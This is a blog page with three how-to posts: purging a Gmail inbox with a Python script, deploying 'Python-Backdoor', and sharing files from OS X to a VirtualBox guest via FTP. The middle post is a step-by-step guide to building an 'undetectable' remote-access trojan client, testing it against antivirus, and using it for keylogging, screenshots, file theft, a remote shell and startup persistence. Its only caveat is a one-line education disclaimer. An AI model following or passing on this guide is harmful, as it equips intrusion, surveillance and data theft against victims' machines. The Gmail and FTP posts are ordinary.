Featured

    Featured Posts

Purge your gmail inbox with this python script

My gmail inbox is full. Cleansing almost 400k of emails from my inbox manually is impossible, so I decided to put into usage a very useful Python script which I found on Github after hours of research. 

Being able to run the script in the background, I managed to cleanse almost 22k emails in a 4 hours period of time. Although not the best tool available, the fact it is open source and free, makes it the best option for my own case.

Download the tool from Github

Make use of the following command to download the source code from the official repository.
git clone https://github.com/marin117/Gmail-deleter.git

How to setup the script on your own machine

Having tested the tool with Python 2.7, I have come to the conclusion that such version of Python is the right one for setting up the environment. As for the dependencies, a virtual environment is required. The following command can help you to setup a fresh virtual environment inside the project's root.
virtualenv -p /usr/bin/python env
source env/bin/activate 
Then install the requirements with the help of the following command.
pip install -r requirements.txt
Once you have managed to successfully install the requirements on your own machine, then comment the following lines.
#import matplotlib.pyplot as plt # on google_client.py
#import matplotlib.pyplot as plt # on gmail_deleter.py
The last thing is to enable the Gmail API and save the credentials.json inside the project's root directory.
Click on Create and then download the configuration.

Once you have downloaded it, save it inside the project's root directory. Such step is required for the authentication. Now you are ready for the purge.

Purge your gmail inbox

The initiation of the purge is as simple as typing the following command while being inside the project's root directory.
python src/gmail_deleter.py
Once the above command is being executed successfully then the following will come up.

Choose the first option as shown below.
1

And let the purging take place. Enjoy the script in the background while working on your daily tasks.
Copyright hackermilk.info

Python Backdoor, fully undetectable and rich in features

Introduction


Python-Backdoor is a fully undetectable backdoor written entirely in Python with the main purpose of  contributing to the cybersecurity field. Rich in features, although it's server can be operated from the whole range of well known operating systems, it targets the Windows machine.

Having tested this cyber weapon on my own lab, I came to the conclusion that such tool is worth being shared with anyone who is passionate about computer security, or penetration testing.

Features

  • Multi-client support
  • Cross-platform server
  • Builtin-keylogger
  • Ability to send command to all clients
  • Ability to capture screenshots
  • Ability to upload/download files
  • Ability to send messages
  • Ability to run at startup
  • Ability to browse files
  • Ability to dump user info
  • Ability to open remote cmd
  • Ability to open remote python interpreter
  • Ability to disable task manager
  • Ability to shutdown/restart/lock pc
  • Ability to melt file on startup

How to setup the Python-Backdoor on your own lab

According to the official documentation shared on the author's Github page, Python-Backdoor requires Python 3.6 or Python 3.7. As for the building of the client, a Windows box is required.

Download the project from the official repository

Run the following command to download the source code for the Python-Backdoor.
git clone https://github.com/xp4xbox/Python-Backdoor.git

Create a virtual environment and install the requirements

Before installing all the python packages required by the project, it is required that you create a fresh virtual environment inside the project's root directory.
cd Python-Backdoor
virtualenv -p /usr/local/bin/python3.7 env
Once you have managed to create the virtual environment install the requirements with the following command.
source env/bin/activate # activate the virtual environment
pip install -r requirements.txt

Setup the victim machine

As for the victim machine, I am going to setup a Windows 10 operating system on my Virtualbox. Not only I am going to infect it, but I am also going to use it for building the client.

Make sure to have Python 3.7 or 3.8 installed on the target machine.

Generate the virus

Once you have managed to download the Python-Backdoor on your Windows machine, make sure to navigate to it and run the following command to install the requirements.
pip install -r requirements.txt
Then edit the following line with the server's IP address on client.py so the virus connects to the server.
strHost = "127.0.0.1"


Then run the following command to finally generate the executable virus.
pyinstaller client.py --exclude-module FixTk --exclude-module tcl --exclude-module tk --exclude-module _tkinter --exclude-module tkinter --exclude-module Tkinter --onefile --windowed


If everything goes fine, you can easily locate the client under the subdirectory dist of the project.

Scan the virus client

It is always a good idea to scan the client with the whole antiviruses available on the target machine; for the purpose of this tutorial I am scanning the fresh client with Microsoft Defender.

Start the server

Before running the client on the target machine, it is required that you start the server. The following command can help to do that.
python server.py # make sure to be inside the project, server side

Run the client on the target

Once you have managed to launch the server on the host machine, go on the target machine and run the client as a normal program.

If everything goes fine, you should get a connection on the server side like shown below.

Interact with the connection

To interact with the connection type the following command.
--i 0 # 0 is the id of the session

Get information on the user

Getting information on the user running the target machine can be achieved with the help of the following command.
--u

Take a screenshot on the target

Taking a screenshot on the victim machine is as easy as typing the following command on the server side.
--p

Start a keylogger on the target machine

To start a keylogger on the victim's machine, just type the following command.
--k start
When you're done, dump the logged data with the following command.
--k dump
The logged data is going to be printed out on the console.

Send a message to the user

The Python-Backdoor offers the option to troll with the victim. Such option is shown in the following command.
--m Hello from space

Download files from the target machine

To download files from the target machine, type the following command.
--r
Then provide the full path of the file you want to download.

Open a remote Python interpreter

It is also possible to run a Python interpreter on the remote machine. The following command can help you to do that.
--i 

Open a remote command prompt

To open a remote shell, type the following command.
--e

Add the rat to startup

Such feature is extremely useful as it automatically triggers a connection back to the server each time the user restarts the target machine.
--a 1

Restart the user

The command to restart the user is being shown below.
--x 2 

Conclusion

Having covered the most important and useful features offered by the Python-Backdoor, it is up to you to further explore and see its abilities in live situations. Being fluent in Python, I find this cyber weapon truly easy to setup and operate.

Disclaimer: Education purposes only.

Copyright hackermilk.info

How to share files from os x host to windows guest on virtualbox via ftp

There are various reasons why one may want to share files from his OS X machine to guests on VirtualBox. No matter the reason, the option offered by default in Oracle VM VirtualBox, does not work straight away.

With the main purpose of easing the struggle of those who are facing a hard time while trying to share files with their guests on VirtualBox, I decided to give some clear and concise instructions as an alternative solution to the problem.

Requirements

  • FTP server on OS X
  • FTP client on guest machine

Launch the FTP server on OS X

The OS X operating system has an FTP server installed by default. It can be easily activated with the help of the following command on the console.
sudo -s launchctl load -w /System/Library/LaunchDaemons/ftp.plist
Once you have managed to start the FTP server on your local OS X machine, you need to find out the IP address of the machine so you can use it later when connecting from the client.

Find out the IP address of the OS X machine 

Run the following command on your terminal console and the IP address will get printed out. Make sure to save it on a text file for later usage.
ifconfig

Start the FTP connection from the guest on Virtualbox

Offering an FTP client by default, we can easily initiate a connection from the Windows guest by making use of the following command.
ftp 192.168.0.10
Note: Make sure to put the IP address of your OS X host machine.

Provide the correct username and password when asked, and be ready to download the files from the FTP server.

Download files from the FTP server

Downloading files from the FTP server is as easy as typing the command get and the absolute path of the file after it.
get /Users/oltjano/Desktop/nc.exe
As you can easily spot from the above illustration, the command for performing the task of file download is simple and very practical.

Download all the files from the directory

In case you need to download multiple files from the FTP server, all you need to do is type the following command while being in the directory containing the files.
mget *
Copyright hackermilk.info

www.CodeNirvana.in

Blog Archive

Recent Posts

Translate

Total Pageviews